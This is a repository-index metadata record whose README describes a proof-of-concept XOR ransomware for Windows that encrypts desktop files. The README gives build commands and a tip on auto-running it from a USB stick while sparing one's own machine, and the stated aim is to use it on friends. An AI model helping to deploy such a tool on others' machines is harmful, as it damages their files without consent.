{"id":26618542,"url":"https://github.com/radurelics/xor-ransomware","last_synced_at":"2026-05-01T10:32:30.261Z","repository":{"id":170135006,"uuid":"646246639","full_name":"RaduRelics/xor-ransomware","owner":"RaduRelics","description":"A POC ransomware to troll your friends. Encrypt and Decrypt a Windows computer using basic xor encryption. ","archived":false,"fork":false,"pushed_at":"2023-05-27T19:15:00.000Z","size":16,"stargazers_count":1,"open_issues_count":0,"forks_count":1,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-02-20T14:42:57.704Z","etag":null,"topics":["c","decryption","encryption","ransomware","windows","xor-cipher"],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/RaduRelics.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-05-27T18:57:34.000Z","updated_at":"2025-02-20T12:25:24.000Z","dependencies_parsed_at":null,"dependency_job_id":"a42541b8-492d-49de-b42e-6f3ca25d3fda","html_url":"https://github.com/RaduRelics/xor-ransomware","commit_stats":null,"previous_names":["michaelradu/xor-ransomware","radurelics/xor-ransomware"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RaduRelics%2Fxor-ransomware","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RaduRelics%2Fxor-ransomware/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RaduRelics%2Fxor-ransomware/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RaduRelics%2Fxor-ransomware/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/RaduRelics","download_url":"https://codeload.github.com/RaduRelics/xor-ransomware/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":245240084,"owners_count":20583098,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["c","decryption","encryption","ransomware","windows","xor-cipher"],"created_at":"2025-03-24T08:42:29.022Z","updated_at":"2026-05-01T10:32:30.169Z","avatar_url":"https://github.com/RaduRelics.png","language":"C","funding_links":[],"categories":[],"sub_categories":[],"readme":"# XOR Ransomware\nThis is a proof of concept ransomware that uses the XOR cipher to encrypt user files. It affects non-system files under the user desktop's directory. This behaviour can be easily changed by replacing `RELATIVE_FOLDER`'s value in `main.c`.\n\nOnce you run the program it will first check if the files under the given directory are encrypted or not. If they are already encrypted it will decrypt them.\n\n## Usage\n\n```bash\ngcc main.c -o main\n./main.exe\n```\n\nIn case you want to have it on a usb stick to auto-run it but want to avoid running it on your own computer, *add an environment variable with the following parameters:* \n```\nKey: FUN_xor_encryption\n\nValue: FUN\n```\n\n### Please note, this repo is for educational purposes only. No contributors, major or minor, are to fault for any actions done by this program.","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fradurelics%2Fxor-ransomware","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fradurelics%2Fxor-ransomware","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fradurelics%2Fxor-ransomware/lists"}